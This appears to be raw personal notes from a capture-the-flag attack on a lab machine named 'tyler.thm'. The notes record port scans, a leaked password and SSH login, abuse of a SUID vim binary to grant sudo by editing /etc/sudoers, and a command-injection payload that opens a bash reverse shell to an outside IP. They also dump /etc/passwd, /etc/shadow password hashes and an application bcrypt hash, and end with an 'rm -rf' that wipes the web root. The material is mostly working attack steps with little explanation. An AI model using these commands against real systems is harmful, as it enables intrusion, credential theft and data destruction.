export IP= 


Discovered open port 80/tcp on 10.10.145.215
Discovered open port 8080/tcp on 10.10.145.215
Discovered open port 139/tcp on 10.10.145.215
Discovered open port 22/tcp on 10.10.145.215
Discovered open port 5000/tcp on 10.10.145.215
Discovered open port 445/tcp on 10.10.145.215
Discovered open port 9999/tcp on 10.10.145.215
Discovered open port 6555/tcp on 10.10.145.215



*public smb
smbclient \\\\tyler.thm\\public


2308b0cccea3f2a187a89a9f3155a3a4


Let's keep things interesting... X8JEETQmf3hkS65f






http://10.10.145.215/betatest/



checkuser.php

 



*fuzzing

tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash
tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash

mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin

narrator:x:1002:1002::/home/narrator:/bin/bash
narrator:x:1002:1002::/home/narrator:/bin/bash

root:x:0:0:root:/root:/bin/bash
operator:x:11:0:operator:/root:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin




*confirm w/ check user


narrator:x:1002:1002::/home/narrator:/bin/bash narrator:x:1002:1002::/home/narrator:/bin/bash

tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash


root:x:0:0:root:/root:/bin/bash operator:x:11:0:operator:/root:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin




ssh narrator:X8JEETQmf3hkS65f

/home/narrator/user.txt
991c65538b9afaf2494f4552b915c948

-rwsr-sr-x. 1 root root     2.3M Aug  8  2019 /usr/bin/vim

vim /etc/sudoers

narrator ALL=(ALL)       ALL

(Esc key)

wq!

(enter)


root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
polkitd:x:999:998:User for polkitd:/:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
chrony:x:998:996::/var/lib/chrony:/sbin/nologin
tdurden:x:1000:1000:Tyler Durden:/home/tdurden:/bin/bash
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
narrator:x:1002:1002::/home/narrator:/bin/bash
tss:x:59:59:Account used by the trousers package to sandbox the tcsd daemon:/dev/null:/sbin/nologin
nginx:x:997:994:Nginx web server:/var/lib/nginx:/sbin/nologin
mysql:x:27:27:MariaDB Server:/var/lib/mysql:/sbin/nologin
librenms:x:996:993::/opt/librenms:/bin/bash





http://tyler.thm/betatest/


narrator;bash -i >& /dev/tcp/10.2.61.119/4321 0>&1


[tdurden@tyler betatest]$ 


/home/tdurden
751ad4b411730e6596d0cc4ae9245106





find / -uid 0 -perm -4000 -type f 2>/dev/null
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/su
/usr/bin/umount
/usr/bin/sudo
/usr/bin/vim
/usr/bin/pkexec
/usr/bin/crontab
/usr/bin/passwd
/usr/bin/staprun
/usr/sbin/pam_timestamp_check
/usr/sbin/unix_chkpwd
/usr/sbin/usernetctl
/usr/lib/polkit-1/polkit-agent-helper-1
/usr/libexec/dbus-1/dbus-daemon-launch-helper
/centos_chroot/usr/lib/polkit-1/polkit-agent-helper-1
/centos_chroot/usr/bin/newgrp
/centos_chroot/usr/bin/chfn
/centos_chroot/usr/bin/chsh
/centos_chroot/usr/bin/chage
/centos_chroot/usr/bin/gpasswd
/centos_chroot/usr/bin/mount
/centos_chroot/usr/bin/su
/centos_chroot/usr/bin/sudo
/centos_chroot/usr/bin/umount
/centos_chroot/usr/bin/pkexec
/centos_chroot/usr/bin/crontab
/centos_chroot/usr/bin/passwd
/centos_chroot/usr/sbin/pam_timestamp_check
/centos_chroot/usr/sbin/unix_chkpwd
/centos_chroot/usr/sbin/usernetctl
/centos_chroot/usr/libexec/dbus-1/dbus-daemon-launch-helper




getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/bin/newgidmap = cap_setgid+ep
/usr/bin/newuidmap = cap_setuid+ep
/usr/sbin/chroot = cap_sys_chroot+ep
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/fping = cap_net_raw+ep
/usr/sbin/fping6 = cap_net_raw+ep
/centos_chroot/usr/bin/newgidmap = cap_setgid+ep
/centos_chroot/usr/bin/newuidmap = cap_setuid+ep
/centos_chroot/usr/bin/ping = cap_net_admin,cap_net_raw+p
/centos_chroot/usr/sbin/arping = cap_net_raw+p
/centos_chroot/usr/sbin/clockdiff = cap_net_raw+p





[+] Last time logon each user
Username         Port     From             Latest
root             tty1                      Fri Mar 27 05:10:28 -0400 2020
tdurden          pts/0    cyberdyne        Thu Mar 26 10:53:11 -0400 2020
narrator         pts/0    ip-10-6-50-199.e Tue Jan 12 17:37:29 -0500 2021
librenms         pts/0                     Wed Mar 25 19:09:31 -0400 2020




mysqyl>librenms>users

mysql     |       1 | admin    | $2y$10$qJIHoC7KmFR/5wOlqDzvFeN8ommowi6nLJC8XM7QpLW4m.TzF/.gy


$2y$10$qJIHoC7KmFR/5wOlqDzvFeN8ommowi6nLJC8XM7QpLW4m.TzF/.gy


/root/root.txt
9a2d57cc33cd052a88fd5ba25d1c953c



/etc/shadow
root:$6$RqRF8KEj$59seFQzpoxKYOe2BmGrHIUdHUWyqoacaTclJdvJ06OFiw8UWYiKmPNu8y8a1mLQU9y25DCOOGcO9adnET76t/.:18347:0:99999:7:::
bin:*:17632:0:99999:7:::
daemon:*:17632:0:99999:7:::
adm:*:17632:0:99999:7:::
lp:*:17632:0:99999:7:::
sync:*:17632:0:99999:7:::
shutdown:*:17632:0:99999:7:::
halt:*:17632:0:99999:7:::
mail:*:17632:0:99999:7:::
operator:*:17632:0:99999:7:::
games:*:17632:0:99999:7:::
ftp:*:17632:0:99999:7:::
nobody:*:17632:0:99999:7:::
systemd-network:!!:18340::::::
dbus:!!:18340::::::
polkitd:!!:18340::::::
sshd:!!:18340::::::
postfix:!!:18340::::::
chrony:!!:18340::::::
tdurden:$6$f91L4dXF$K14TtD3ifVeu.Tj6dYkLRyyCaGV/dKgOKMgvr8S2tv0egYKVR7GR6BGyjcsjIbylLgxFq.CLU6gpa5wJjZqne.:18347:0:99999:7:::
apache:!!:18346::::::
narrator:$6$GOJ/uv0s$PV7/m82FbE9RnhXoHVpESqiQLiXop4Ocp63YK5I9Oo/hBCc.dbU/5u8OJz8dVixVPjIDCoKN711cJZr.arm0w0:18346:0:99999:7:::
tss:!!:18346::::::
nginx:!!:18346::::::
mysql:!!:18346::::::
librenms:!!:18346::::::


rm -rf /var/www/html/*
